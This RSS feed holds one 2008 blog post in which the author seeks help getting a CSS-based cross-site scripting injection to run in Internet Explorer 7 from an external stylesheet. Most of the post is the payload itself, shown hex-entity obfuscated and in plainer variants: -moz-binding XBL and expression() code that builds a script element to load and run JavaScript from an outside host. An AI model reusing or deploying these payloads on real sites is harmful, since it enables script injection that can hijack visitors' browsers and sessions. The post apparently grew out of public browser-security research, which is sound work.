<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Share and let Internet Comunity make backups for your work</title>
	<atom:link href="http://noconnexion.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://noconnexion.wordpress.com</link>
	<description>Back-up Back-up and always Back-up</description>
	<lastBuildDate>Fri, 01 Feb 2008 11:28:59 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='noconnexion.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Share and let Internet Comunity make backups for your work</title>
		<link>http://noconnexion.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://noconnexion.wordpress.com/osd.xml" title="Share and let Internet Comunity make backups for your work" />
	<atom:link rel='hub' href='http://noconnexion.wordpress.com/?pushpress=hub'/>
		<item>
		<title>XSS</title>
		<link>http://noconnexion.wordpress.com/2008/01/20/xss/</link>
		<comments>http://noconnexion.wordpress.com/2008/01/20/xss/#comments</comments>
		<pubDate>Sun, 20 Jan 2008 02:43:26 +0000</pubDate>
		<dc:creator>noconnexion</dc:creator>
				<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://noconnexion.wordpress.com/2008/01/20/xss/</guid>
		<description><![CDATA[OK, I had to do this&#8230;  After (2 long) days of testing a re-testing I was forced by circumstances to create this blog dedicated to understanding Ultimate XSS CSS injection and because I didn&#8217;t want to make that awesome page a mess with my comments. So this page is dedicated to those people who can [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=noconnexion.wordpress.com&amp;blog=2565534&amp;post=3&amp;subd=noconnexion&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://noconnexion.files.wordpress.com/2008/02/attitude.jpg" title="Your Opinion Counts"></a></p>
<p><a href="http://noconnexion.files.wordpress.com/2008/02/attitude1.jpg" title="attitude1.jpg"></a></p>
<p align="center"><a href="http://noconnexion.files.wordpress.com/2008/02/attitude2.jpg" title="Your Opinion Counts"><img width="385" src="http://noconnexion.files.wordpress.com/2008/02/attitude2.jpg?w=385&#038;h=528" alt="Your Opinion Counts" height="528" style="width:297px;height:343px;" /></a></p>
<p align="center">OK, I had to do this&#8230;</p>
<p> After (2 long) days of testing a re-testing I was forced by circumstances to create this blog dedicated to understanding <a href="http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/"><b>Ultimate XSS CSS injection</b></a> and because I didn&#8217;t want to make that awesome page a mess with my comments.</p>
<p>So this page is dedicated to those people who can and will help me solve this &#8211; especially <span class="comment-author vcard"><span class="fn n"><a rel="external nofollow" href="http://www.businessinfo.co.uk/">Gareth Heyes</a>. who takes the credit for all this.</span></span></p>
<p>The facts:</p>
<p>We have this XSS injection <a href="http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/">&#8220;hackvectoreted&#8221;</a> below:</p>
<p>&lt;div style=&#8221;\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs<br />
\/xbl\/xbl\.xml\#xss);&amp;#x78&amp;#x78&amp;#x3A&amp;#x20&amp;#x65&amp;#x5C<br />
&amp;#x78&amp;#x70&amp;#x5C&amp;#x72&amp;#x65&amp;#x5C&amp;#x73&amp;#x5C&amp;#x73&amp;#x5C<br />
&amp;#x69&amp;#x5C&amp;#x6F&amp;#x5C&amp;#x6E&amp;#x28&amp;#x28&amp;#x77&amp;#x69&amp;#x6E<br />
&amp;#x64&amp;#x6F&amp;#x77&amp;#x2E&amp;#x72&amp;#x21&amp;#x3D&amp;#x31&amp;#x29&amp;#x20<br />
&amp;#x3F&amp;#x20&amp;#x65&amp;#x76&amp;#x61&amp;#x6C&amp;#x28&amp;#x27&amp;#x78&amp;#x3D<br />
&amp;#x53&amp;#x74&amp;#x72&amp;#x69&amp;#x6E&amp;#x67&amp;#x2E&amp;#x66&amp;#x72&amp;#x6F<br />
&amp;#x6D&amp;#x43&amp;#x68&amp;#x61&amp;#x72&amp;#x43&amp;#x6F&amp;#x64&amp;#x65&amp;#x3B<br />
&amp;#x73&amp;#x63&amp;#x72&amp;#x3D&amp;#x64&amp;#x6F&amp;#x63&amp;#x75&amp;#x6D&amp;#x65<br />
&amp;#x6E&amp;#x74&amp;#x2E&amp;#x63&amp;#x72&amp;#x65&amp;#x61&amp;#x74&amp;#x65&amp;#x45<br />
&amp;#x6C&amp;#x65&amp;#x6D&amp;#x65&amp;#x6E&amp;#x74&amp;#x28&amp;#x78&amp;#x28&amp;#x31<br />
&amp;#x31&amp;#x35&amp;#x2C&amp;#x39&amp;#x39&amp;#x2C&amp;#x31&amp;#x31&amp;#x34&amp;#x2C<br />
&amp;#x31&amp;#x30&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x32&amp;#x2C&amp;#x31&amp;#x31<br />
&amp;#x36&amp;#x29&amp;#x29&amp;#x3B&amp;#x73&amp;#x63&amp;#x72&amp;#x2E&amp;#x73&amp;#x65<br />
&amp;#x74&amp;#x41&amp;#x74&amp;#x74&amp;#x72&amp;#x69&amp;#x62&amp;#x75&amp;#x74&amp;#x65<br />
&amp;#x28&amp;#x78&amp;#x28&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x34<br />
&amp;#x2C&amp;#x39&amp;#x39&amp;#x29&amp;#x2C&amp;#x78&amp;#x28&amp;#x31&amp;#x30&amp;#x34<br />
&amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x2C&amp;#x31<br />
&amp;#x31&amp;#x32&amp;#x2C&amp;#x35&amp;#x38&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x34<br />
&amp;#x37&amp;#x2C&amp;#x39&amp;#x38&amp;#x2C&amp;#x31&amp;#x31&amp;#x37&amp;#x2C&amp;#x31<br />
&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x30&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x30<br />
&amp;#x2C&amp;#x31&amp;#x30&amp;#x31&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x31<br />
&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x30&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x30<br />
&amp;#x2C&amp;#x31&amp;#x30&amp;#x32&amp;#x2C&amp;#x31&amp;#x31&amp;#x31&amp;#x2C&amp;#x34<br />
&amp;#x36&amp;#x2C&amp;#x39&amp;#x39&amp;#x2C&amp;#x31&amp;#x31&amp;#x31&amp;#x2C&amp;#x34<br />
&amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x37&amp;#x2C&amp;#x31&amp;#x30&amp;#x37&amp;#x2C<br />
&amp;#x34&amp;#x37&amp;#x2C&amp;#x31&amp;#x30&amp;#x38&amp;#x2C&amp;#x39&amp;#x37&amp;#x2C<br />
&amp;#x39&amp;#x38&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C<br />
&amp;#x31&amp;#x32&amp;#x30&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x31<br />
&amp;#x35&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x31&amp;#x32&amp;#x30&amp;#x2C&amp;#x31<br />
&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x34&amp;#x36&amp;#x2C<br />
&amp;#x31&amp;#x30&amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x29&amp;#x29&amp;#x3B<br />
&amp;#x64&amp;#x6F&amp;#x63&amp;#x75&amp;#x6D&amp;#x65&amp;#x6E&amp;#x74&amp;#x2E&amp;#x67<br />
&amp;#x65&amp;#x74&amp;#x45&amp;#x6C&amp;#x65&amp;#x6D&amp;#x65&amp;#x6E&amp;#x74&amp;#x42<br />
&amp;#x79&amp;#x49&amp;#x64&amp;#x28&amp;#x78&amp;#x28&amp;#x20&amp;#x31&amp;#x30&amp;#x35<br />
&amp;#x2C&amp;#x31&amp;#x31&amp;#x30&amp;#x2C&amp;#x31&amp;#x30&amp;#x36&amp;#x2C&amp;#x31<br />
&amp;#x30&amp;#x31&amp;#x2C&amp;#x39&amp;#x39&amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x20<br />
&amp;#x29&amp;#x29&amp;#x2E&amp;#x61&amp;#x70&amp;#x70&amp;#x65&amp;#x6E&amp;#x64&amp;#x43<br />
&amp;#x68&amp;#x69&amp;#x6C&amp;#x64&amp;#x28&amp;#x73&amp;#x63&amp;#x72&amp;#x29&amp;#x3B<br />
&amp;#x77&amp;#x69&amp;#x6E&amp;#x64&amp;#x6F&amp;#x77&amp;#x2E&amp;#x72&amp;#x3D&amp;#x31<br />
&amp;#x3B&amp;#x27&amp;#x29 : 1);&#8221; id=&#8221;inject&#8221;&gt;test&lt;/div&gt;</p>
<p><span class="comment-author vcard"> If we have to copy paste (and remove line breaks) into the HTML code this should work fine both FF and IE70 <font color="#ff0000"><b>BUT</b></font> what I would love to do is make this work through a css file.</span></p>
<p><span class="comment-author vcard">This should be an easy task but let&#8217;s have a look.</span></p>
<p><span class="comment-author vcard">I have this test.html file like this one below (this was done using the link method and could be done using @import method but I&#8217;m pretty sure this is not the point)</span></p>
<p>&lt;html&gt;<br />
&lt;body&gt;</p>
<p>&lt;link rel=&#8221;stylesheet&#8221; type=&#8221;text/css&#8221; href=&#8221;test.css&#8221; mce_href=&#8221;test.css&#8221;&gt;<br />
&lt;div id=&#8221;navigation&#8221;&gt;&#8211; Test &#8211;&lt;/div&gt;</p>
<p>&lt;/body&gt;<br />
&lt;/html&gt;</p>
<p>And a css file named test.css like this one below (remember line breaks):</p>
<p>div#navigation<br />
{<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\<br />
.xml\#xss);&amp;#x78&amp;#x78&amp;#x3A&amp;#x20&amp;#x65&amp;#x5C&amp;#x78&amp;#x70&amp;#x5C&amp;#x72&amp;#x6<br />
5&amp;#x5C&amp;#x73&amp;#x5C&amp;#x73&amp;#x5C&amp;#x69&amp;#x5C&amp;#x6F&amp;#x5C&amp;#x6E&amp;#x28&amp;#x28&amp;#x7<br />
7&amp;#x69&amp;#x6E&amp;#x64&amp;#x6F&amp;#x77&amp;#x2E&amp;#x72&amp;#x21&amp;#x3D&amp;#x31&amp;#x29&amp;#x20&amp;#x3<br />
F&amp;#x20&amp;#x65&amp;#x76&amp;#x61&amp;#x6C&amp;#x28&amp;#x27&amp;#x78&amp;#x3D&amp;#x53&amp;#x74&amp;#x72&amp;#x6<br />
9&amp;#x6E&amp;#x67&amp;#x2E&amp;#x66&amp;#x72&amp;#x6F&amp;#x6D&amp;#x43&amp;#x68&amp;#x61&amp;#x72&amp;#x43&amp;#x6<br />
F&amp;#x64&amp;#x65&amp;#x3B&amp;#x73&amp;#x63&amp;#x72&amp;#x3D&amp;#x64&amp;#x6F&amp;#x63&amp;#x75&amp;#x6D&amp;#x6<br />
5&amp;#x6E&amp;#x74&amp;#x2E&amp;#x63&amp;#x72&amp;#x65&amp;#x61&amp;#x74&amp;#x65&amp;#x45&amp;#x6C&amp;#x65&amp;#x6<br />
D&amp;#x65&amp;#x6E&amp;#x74&amp;#x28&amp;#x78&amp;#x28&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x39&amp;#x39&amp;#x2<br />
C&amp;#x31&amp;#x31&amp;#x34&amp;#x2C&amp;#x31&amp;#x30&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x32&amp;#x2C&amp;#x3<br />
1&amp;#x31&amp;#x36&amp;#x29&amp;#x29&amp;#x3B&amp;#x73&amp;#x63&amp;#x72&amp;#x2E&amp;#x73&amp;#x65&amp;#x74&amp;#x4<br />
1&amp;#x74&amp;#x74&amp;#x72&amp;#x69&amp;#x62&amp;#x75&amp;#x74&amp;#x65&amp;#x28&amp;#x78&amp;#x28&amp;#x31&amp;#x3<br />
1&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x34&amp;#x2C&amp;#x39&amp;#x39&amp;#x29&amp;#x2C&amp;#x78&amp;#x28&amp;#x3<br />
1&amp;#x30&amp;#x34&amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x2C&amp;#x31&amp;#x3<br />
1&amp;#x32&amp;#x2C&amp;#x35&amp;#x38&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x39&amp;#x3<br />
8&amp;#x2C&amp;#x31&amp;#x31&amp;#x37&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x30&amp;#x35&amp;#x2<br />
C&amp;#x31&amp;#x31&amp;#x30&amp;#x2C&amp;#x31&amp;#x30&amp;#x31&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x3<br />
1&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x30&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x30&amp;#x2C&amp;#x31&amp;#x3<br />
0&amp;#x32&amp;#x2C&amp;#x31&amp;#x31&amp;#x31&amp;#x2C&amp;#x34&amp;#x36&amp;#x2C&amp;#x39&amp;#x39&amp;#x2C&amp;#x3<br />
1&amp;#x31&amp;#x31&amp;#x2C&amp;#x34&amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x37&amp;#x2C&amp;#x31&amp;#x30&amp;#x3<br />
7&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x31&amp;#x30&amp;#x38&amp;#x2C&amp;#x39&amp;#x37&amp;#x2C&amp;#x39&amp;#x3<br />
8&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x31&amp;#x32&amp;#x30&amp;#x2C&amp;#x3<br />
1&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x31&amp;#x32&amp;#x3<br />
0&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x34&amp;#x36&amp;#x2C&amp;#x3<br />
1&amp;#x30&amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x29&amp;#x29&amp;#x3B&amp;#x64&amp;#x6F&amp;#x63&amp;#x7<br />
5&amp;#x6D&amp;#x65&amp;#x6E&amp;#x74&amp;#x2E&amp;#x67&amp;#x65&amp;#x74&amp;#x45&amp;#x6C&amp;#x65&amp;#x6D&amp;#x6<br />
5&amp;#x6E&amp;#x74&amp;#x42&amp;#x79&amp;#x49&amp;#x64&amp;#x28&amp;#x78&amp;#x28&amp;#x20&amp;#x31&amp;#x30&amp;#x3<br />
5&amp;#x2C&amp;#x31&amp;#x31&amp;#x30&amp;#x2C&amp;#x31&amp;#x30&amp;#x36&amp;#x2C&amp;#x31&amp;#x30&amp;#x31&amp;#x2<br />
C&amp;#x39&amp;#x39&amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x20&amp;#x29&amp;#x29&amp;#x2E&amp;#x61&amp;#x70&amp;#x7<br />
0&amp;#x65&amp;#x6E&amp;#x64&amp;#x43&amp;#x68&amp;#x69&amp;#x6C&amp;#x64&amp;#x28&amp;#x73&amp;#x63&amp;#x72&amp;#x2<br />
9&amp;#x3B&amp;#x77&amp;#x69&amp;#x6E&amp;#x64&amp;#x6F&amp;#x77&amp;#x2E&amp;#x72&amp;#x3D&amp;#x31&amp;#x3B&amp;#x2<br />
7&amp;#x29 : 1);<br />
} </p>
<p>Now we run a test &#8211; FF shows what it was supposed to show &#8220;XBL XSS&#8221; and this means it works <font color="#ff0000"><b>BUT</b></font> IE70 does nothing instead of running this js code <a href="http://businessinfo.co.uk/labs/xss/xss.js">http://businessinfo.co.uk/labs/xss/xss.js</a> well hidden with &lt;@tocharcodes&gt; and &lt;@hex_ent&gt; using the <a href="http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php">hackvector</a></p>
<p>You can test this by using FF or IE7 here.</p>
<p>Of course I&#8217;ve tried many many different variations of this XSS injection and googled till my eyes blowened out but none of them worked &#8211; at least not for IE70. I had to admit I&#8217;ve learned something about the css&#8217;s becasue I was 0 here but right now I&#8217;m just tired of learning and need an answer so <i>please</i> make my day and give me the answer and if you do please make sure the last noob on earth will understand this.</p>
<p>Other variations of the test.css file you&#8217;ll find below:</p>
<p>div#navigation<br />
{<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(&#8216;x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;&#8217;) : 1);<br />
}</p>
<p>OR</p>
<p>div#navigation<br />
{<br />
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(&#8216;x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<a href="http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x">http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x</a>( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;&#8217;) : 1);<br />
}</p>
<p>I ask for <font color="#ff0000">5</font> minutes off your time and I welcome your comments</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/noconnexion.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/noconnexion.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/noconnexion.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/noconnexion.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/noconnexion.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/noconnexion.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/noconnexion.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/noconnexion.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/noconnexion.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/noconnexion.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/noconnexion.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/noconnexion.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/noconnexion.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/noconnexion.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/noconnexion.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/noconnexion.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=noconnexion.wordpress.com&amp;blog=2565534&amp;post=3&amp;subd=noconnexion&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://noconnexion.wordpress.com/2008/01/20/xss/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8be766844d0950737989494ae33f3620?s=96&#38;d=identicon" medium="image">
			<media:title type="html">noconnexion</media:title>
		</media:content>

		<media:content url="http://noconnexion.files.wordpress.com/2008/02/attitude2.jpg" medium="image">
			<media:title type="html">Your Opinion Counts</media:title>
		</media:content>
	</item>
	</channel>
</rss>
